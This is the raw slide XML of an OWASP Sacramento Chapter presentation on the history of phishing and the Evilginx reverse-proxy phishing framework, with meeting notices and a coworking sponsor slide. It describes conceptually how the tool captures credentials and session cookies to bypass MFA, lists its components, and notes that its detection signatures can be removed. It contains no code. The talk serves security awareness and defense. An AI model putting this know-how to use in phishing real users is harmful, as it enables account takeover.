            <a:ext cx="10515300" cy="4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Meeting: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June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b="1" baseline="30000" lang="en-US" sz="280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7PM-9PM (same location)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for Presentations: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June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July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(same location)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If you’d like to present (or know someone else who would) at the OWASP Sacramento Chapter’s upcoming meetings, please email us your topic.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don’t need to be an expert!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Joubin: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joubin.jabbari@owasp.org</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="28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Ryan:   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ryan.kozak@owasp.org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797133" y="980105"/>
            <a:ext cx="10515600" cy="1385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2000">
              <a:solidFill>
                <a:srgbClr val="5378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at Granite City means you’re part of an engaging, inviting and supportive ecosystem. It means you’re in the company of like-minded and exciting professionals. It means you’ve joined a place to grow your business and be supported in the process.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logo&#10;&#10;Description automatically generated" id="192" name="Google Shape;1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0948" y="394230"/>
            <a:ext cx="1147919" cy="88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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925350" y="2649234"/>
            <a:ext cx="32140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memberships include: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High-speed &amp; secure wi-fi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to printer/copier/scanner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Invites to exclusive member-only social events and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of our community kitchen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Locally roasted craft coffee served hot and ready until 3pm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4447889" y="2649234"/>
            <a:ext cx="321408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Office &amp; what you’ll get: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24/7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 Key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hours of free meeting room space per month (Town Hall or Gallery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7970428" y="2649234"/>
            <a:ext cx="3214088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Coworking &amp; what you’ll get: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Part-Time Membership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4 days per month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Weekdays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8:30am-5pm Monday – Friday access, digital key entry, 2 hours of free meeting space per month (Gallery)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Time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24/7 access, digital key access, 2 hours of free meeting space per month (Gallery)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2bef3c2ac_0_32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OWASP Sacramento Chapter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32bef3c2ac_0_32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838075" y="1801448"/>
            <a:ext cx="105153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Community stuff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402910282_0_24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5206875" y="2468275"/>
            <a:ext cx="124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/>
              <a:t>Evilginx</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="Google Shape;207;g22402910282_0_24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2942000" y="3176275"/>
            <a:ext cx="60198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Reverse-proxy phishing framework able to bypass MFA [</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr i="1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g22402910282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900" y="1069225"/>
            <a:ext cx="2423140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02910282_0_987"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838078" y="216000"/>
            <a:ext cx="3473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Phishing: A Brief History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pic>
        <p:nvPicPr>
          <p:cNvPr id="214" name="Google Shape;214;g22402910282_0_9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6525" y="175408"/>
            <a:ext cx="1733100" cy="14062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g22402910282_0_987"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="621549" y="2121563"/>
            <a:ext cx="2792875" cy="2661589"/>
            <a:chOff x="466173" y="1591212"/>
            <a:chExt cx="2094709" cy="1996241"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="216" name="Google Shape;216;g22402910282_0_987"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="902781" y="3080265"/>
              <a:ext cx="15345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22402910282_0_987"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="466173" y="3216054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1996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8" name="Google Shape;218;g22402910282_0_987"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="851208" y="2800855"/>
              <a:ext cx="92400" cy="411825"/>
              <a:chOff x="845575" y="2563700"/>
              <a:chExt cx="92400" cy="411825"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="219" name="Google Shape;219;g22402910282_0_987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0" name="Google Shape;220;g22402910282_0_987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g22402910282_0_987"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="779182" y="1591212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Technique is Borne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According to Internet records, the first time that the term “phishing” was used and recorded was on January 2, 1996. The mention occurred in a Usenet newsgroup called</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:uFill>
                    <a:noFill/>
                  </a:u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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" u="sng">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t>AOHell</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>.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g22402910282_0_987"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2762204" y="3604425"/>
            <a:ext cx="2711862" cy="2310775"/>
            <a:chOff x="2071705" y="2703387"/>
            <a:chExt cx="2033947" cy="1733124"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="223" name="Google Shape;223;g22402910282_0_987"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2437281" y="3080265"/>
              <a:ext cx="15345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22402910282_0_987"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2323952" y="3492711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Phishing Continues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Between May 2004 and May 2005, about 1.2 million users in the U.S. suffer losses caused by phishing, totaling approximately $929 million.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g22402910282_0_987"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2071705" y="27033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2000’s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6" name="Google Shape;226;g22402910282_0_987"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="10800000">
              <a:off x="2395183" y="3080258"/>
              <a:ext cx="92400" cy="411825"/>
              <a:chOff x="2070100" y="2563700"/>
              <a:chExt cx="92400" cy="411825"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="227" name="Google Shape;227;g22402910282_0_98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8" name="Google Shape;228;g22402910282_0_98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" name="Google Shape;229;g22402910282_0_987"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4857088" y="2191113"/>
            <a:ext cx="2649232" cy="2592025"/>
            <a:chOff x="3642907" y="1643376"/>
            <a:chExt cx="1986973" cy="1944067"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="230" name="Google Shape;230;g22402910282_0_987"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3971778" y="3080265"/>
              <a:ext cx="15345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g22402910282_0_987"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3924544" y="2800855"/>
              <a:ext cx="92400" cy="411825"/>
              <a:chOff x="845575" y="2563700"/>
              <a:chExt cx="92400" cy="411825"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="232" name="Google Shape;232;g22402910282_0_987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3" name="Google Shape;233;g22402910282_0_987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" name="Google Shape;234;g22402910282_0_987"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3642907" y="321604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2010’s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g22402910282_0_987"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3848181" y="1643376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Broad Adoption of HTTPS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</a:rPr>
                <a:t>Phishermen begin implementing HTTPS via services like LetsEncrypt and victims who were taught to check for the lock symbol in their browser were given a sense of false security.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g22402910282_0_987"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6841548" y="3604425"/>
            <a:ext cx="3218006" cy="2310768"/>
            <a:chOff x="5131289" y="2703387"/>
            <a:chExt cx="2413565" cy="1733119"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="237" name="Google Shape;237;g22402910282_0_987"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5506276" y="3080265"/>
              <a:ext cx="15345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g22402910282_0_987"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="10800000">
              <a:off x="5455515" y="3080258"/>
              <a:ext cx="92400" cy="411825"/>
              <a:chOff x="2070100" y="2563700"/>
              <a:chExt cx="92400" cy="411825"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="239" name="Google Shape;239;g22402910282_0_98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0" name="Google Shape;240;g22402910282_0_98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g22402910282_0_987"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5131289" y="27033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2017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g22402910282_0_987"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5370454" y="3492706"/>
              <a:ext cx="21744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latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Evilginx is released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Custom version of Nginx HTTP server to provide MITM functionality, acting as a proxy between a browser and phished website. Defeats many implementations of Multifactor Authentication by capturing session tokens.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g22402910282_0_987"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8894473" y="2321299"/>
            <a:ext cx="3300533" cy="2461839"/>
            <a:chOff x="6671021" y="1741018"/>
            <a:chExt cx="2475461" cy="1846425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="244" name="Google Shape;244;g22402910282_0_987"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7040783" y="3080265"/>
              <a:ext cx="21057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" name="Google Shape;245;g22402910282_0_987"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6994658" y="2800855"/>
              <a:ext cx="92400" cy="411825"/>
              <a:chOff x="845575" y="2563700"/>
              <a:chExt cx="92400" cy="411825"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="246" name="Google Shape;246;g22402910282_0_987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7" name="Google Shape;247;g22402910282_0_987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" name="Google Shape;248;g22402910282_0_987"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671021" y="3216043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2020’s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g22402910282_0_987"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6939717" y="1741018"/>
              <a:ext cx="1781700" cy="10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latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Cat and Mouse Games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Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Phishing is still VERY effective, and Phishing as a service is now even a thing. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Direct financial loss from successful</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:uFill>
                    <a:noFill/>
                  </a:uFill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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" u="sng">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                  <a:hlinkClick r:id="rId7"/>
                </a:rPr>
                <a:t>phishing</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> increased by 76% in 2022.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" name="Google Shape;250;g22402910282_0_987"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10276525" y="1541100"/>
            <a:ext cx="173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https://www.phishing.org/history-of-phishing</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Google Shape;251;g22402910282_0_987"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838075" y="932825"/>
            <a:ext cx="50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MITRE ATT&amp;CK: Phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>T1566</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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MITRE ATT&amp;CK: Phishing Link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>T1566.002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+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MITRE ATT&amp;CK: Steal Application Access Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>T1528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MITRE ATT&amp;CK: Man-in-the-Middle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>T1557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MITRE ATT&amp;CK: Two-Factor Auth Interception </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>T1111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2" name="Google Shape;252;g22402910282_0_987"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1653425" y="7725"/>
            <a:ext cx="4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402910282_0_5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Modern Phishing: Evilginx</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Google Shape;258;g22402910282_0_5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838075" y="1510975"/>
            <a:ext cx="105153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</a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vilginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows attackers to bypass 2-factor authentication protection of many forms.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</a:rPr>
              <a:t>Version 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Released May 10</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2023 (Community and Pro Versions now available)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HTTP client/server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website.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Implements its own DNS server.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Utilizes LetsEncrypt for TLS certs and manages them for you.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Does contain known signatures for Blue Teams, can be removed. Version 3 signatures TBD?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FIDO2 will protect you as it’s domain specific.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Operationalizing it takes creativity, speed, and contains many other small nuances.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GitHub Project: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https://github.com/kgretzky/evilginx2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="259" name="Google Shape;259;g22402910282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402910282_0_11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Evilginx: Primary Components</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Google Shape;265;g22402910282_0_11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="917225" y="1926750"/>
            <a:ext cx="105153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Config: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON file that can be preconfigured to aid in automated deployments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Phishlets: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YAML templates for specific target websites. Ex: O365, LinkedIn, etc.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Lures: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pre-generated phishing links to send to victims, created from a Phishlet.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Redirectors: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Websites, acting as a landing pages to your phishing links.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Sessions:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Captured credentials and session cookies from victim interactions.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Proxy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Outbound traffic proxy for dev purposes to to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obscure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> infrastructure IP.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Blacklist: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Black scanners by IP, defaults to adding any request not made to a specific Lure URL.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g22402910282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2402910282_0_11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838075" y="1710713"/>
            <a:ext cx="56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2021-03-25T22:44:50Z</dcterms:created>
  <dc:creator>Joubin Jabbari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  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MMClips">
    <vt:i4>1</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="PresentationFormat">
    <vt:lpwstr>Widescreen</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Slides">
    <vt:i4>16</vt:i4>
  </property>
</Properties>
</file>